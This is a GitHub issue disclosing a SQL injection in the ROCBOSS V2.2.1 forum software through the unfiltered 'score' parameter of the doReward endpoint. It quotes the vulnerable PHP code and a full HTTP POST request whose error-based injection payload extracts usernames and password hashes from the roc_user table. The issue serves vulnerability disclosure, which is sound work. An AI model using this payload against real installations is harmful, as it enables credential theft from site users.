ROCBOSS V2.2.1 has SQL injection via the Post:doReward score paramter.
blankqaz opened this issue · comments
Verify that sql injection requires registration and score>1:
https://github.com/rocboss/ROCBOSS/blob/master/app/controllers/frontend/PostController.php#L460
if ($uid > 0) {
if ($score >= 1 && $score <= 1000) {
$topic = TopicModel::m()->getByTid($tid);
if (!empty($topic)) {
if ($topic['uid'] == $uid) {
parent::json('error', '抱歉,不能打赏自己的主题');
}
$userScore = UserModel::m()->getUserScore($uid);
if ($userScore < $score) {
parent::json('error', '您的积分余额('.$userScore.')不足以支付');
}
https://github.com/rocboss/ROCBOSS/blob/master/app/controllers/frontend/PostController.php#L482
The $score is not filtered, and the sql statement query is directly executed.
$ret = $db->exec("UPDATE roc_userSETscore=score- ".$score." WHEREuid = ".$uid);
send http request:
frontend\Post:doReward
POST /do/reward/3 HTTP/1.1
Host: 192.168.123.1:8080
Content-Length: 228
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://192.168.123.1:8080
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.123.1:8080/read/3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=knbbc98gv9vk73rlpd0hnq3t73; XDEBUG_SESSION=12790; roc_login=wadwagd; roc_secure=6f88bb85-0a26-b350-7531-a01b38583fab; Hm_lvt_48042604b3c7a9973810a87540843e34=1555140928; Hm_lpvt_48042604b3c7a9973810a87540843e34=1555256375
Connection: close
score=1+and(select+1+from(select+count(*),concat(((select+(SELECT+concat(username,0x7e,`password`)+FROM+roc_user+LIMIT+0,1))),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)&_csrf=e08b5c447d9d69f7aef921aef1e8fa89
Thanks for reminding.